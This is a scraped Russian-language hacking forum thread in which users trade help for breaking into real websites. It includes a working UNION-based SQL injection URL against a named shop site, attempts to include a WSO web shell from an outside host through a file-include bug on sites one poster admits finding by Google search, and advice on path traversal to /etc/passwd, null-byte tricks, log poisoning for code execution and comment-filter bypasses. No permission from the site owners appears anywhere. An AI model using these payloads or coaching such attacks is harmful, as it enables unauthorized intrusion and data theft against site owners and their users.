Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а в чём собственно проблема?

     
  2. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Ситуация, когда один и тот же параметр учавствет в нескольких запросах: тыц

    Union'ом можно крутить на другом уязвимом параметре:
     
  3. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=88
    Изменяя последнее число получаются разные ошибки, типа
    http://www.zoovet.ru/forum/gold_fond.php?tid=123&tag=115
    можно попробовать как то покрутить? или вообще в каком направлении идти?
     
  4. Soliariss

    Soliariss New Member

    Joined:
    5 Nov 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть сайт с самописной cms, крутится на php 5.3.15, nginx 1.0.5.
    url'ы вида site.com/lang/site/news/id/33/ ,GET-запросы фильтруються...
    С какой стороны можно подступиться к аудиту ;) Думаю, для начала просканировать порты nmap. Что подскажут гуру?! :rolleyes:
     
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Ошибки вылезают из-за неправилной кодировки.
    Для первого случая, âåêî - веко (CP1252 ---> CP1251). Крутить не получится.
     
  6. jassoctov

    jassoctov New Member

    Joined:
    6 Nov 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Можно ли это как то раскрутить, и в каком направлении думатью
    Движок DLE
    Запрос http://******.**/soft/page/99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/
    [​IMG]
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    выводит
    дальше что то неполучается, information_schema почему то тоже нет, разве в 5 Mysql он необязателен? Помогите)
     
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Брут никто не отменял :)
     
    1 person likes this.
  9. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    information_schema существует, просто доступа к ней нет у того пользователя от которого делаются запросы.
     
    1 person likes this.
  10. SunHere

    SunHere New Member

    Joined:
    6 May 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Добрый день, есть локальный инклуд вида""Warning: include(inc/123.php) [function.include]: failed to open stream: No such file or directory in"
    когда я в переменную вставляю http://evilsite.ru/wso2.php, то на странице выводится ошибка:"Warning: include(inc/http://evilsite.ru/wso2.php)", вопрос как обрезать добавление префикса "inc/" ?

    p.s интересует тема тестирования безопасности сайта, выбрал несколько сайтов в гугле, которые выводят такое сообщения и хочу попробовать добиться использования этой уязвимости для более глубокого понимания.
     
    #22710 SunHere, 8 Nov 2013
    Last edited: 8 Nov 2013
  11. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Никак, локальный инклуд и есть локальный инклуд. Пробуй загрузить файл со своим php кодом на сайт и инклудь его.
     
  12. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Его ничем нельзя отрезать ибо он заранее указан как префикс, можно подключить локальный файл, например ../../../../../../etc/passwd (если Unix), почитать логи, выполнить через них код и т.д
     
  13. SunHere

    SunHere New Member

    Joined:
    6 May 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Окей, я начал пробовать подключить этот файл, но выводится следующее сообщение
    HTML:
    Warning: include(inc/../../../../../../../etc/passwd.php)
    Когда же добавляю ../../../../../../etc/passwd%00, то вместо ошибки на сайте выводится стандартная страница, как будто без параметров отправился запрос. Какие тут возможные действия дальше?
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Просмотри исходный код страници и как вариант еще попробовать ../../../../../../etc/passwd%000 иногда проходит.
     
    _________________________
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Нашёл скулю, не могу достать данные с таблицы admin
    Code:
    http://www.olvia.ru/rus/products.php?s=3%27+union+select+1,2,3,TABLE_NAME,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+50,99+--+
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    таблица admin находится в базе test
     
    _________________________
  17. chado

    chado New Member

    Joined:
    17 Sep 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Добрый день)
    server.com/index.php?id=22' выдает следующее:

    DB ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22'' LIMIT 1' at line 1

    SELECT * FROM `Films` WHERE `ID` = '22'' LIMIT 1
    Notice: Undefined index: ID in /usr/local/www/server.com/index.php on line 75

    При попытке вставить в запрос UNION SELECT подвисает (Код ошибки: ERR_TIMED_OUT), на UNION SELCT:
    SELECT * FROM `Films` WHERE `ID` = '22' UNION SELCT' LIMIT 1

    Как нибудь можно обойти? И еще фильтрует ##
     
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    нужно закомментировать остаток запроса --+
     
    _________________________
  19. chado

    chado New Member

    Joined:
    17 Sep 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    server.com/index.php?id=-1'+BLA+BLA+BLA+--%20
    выдает в коде ошибки:
    SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA -- ' LIMIT 1

    server.com/index.php?id=-1'+BLA+BLA+BLA+#%20
    выдает в коде ошибки:
    SELECT * FROM `Films` WHERE `ID` = '-1' AND BLA BLA BLA ' LIMIT 1

    Видимо комментирование только через # и этот символ фильтруется.
    Что нибудь можно сделать?
     
  20. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Попробуй аналог незакрытого коммментария /* для 5-ой версии mysql:

     
Thread Status:
Not open for further replies.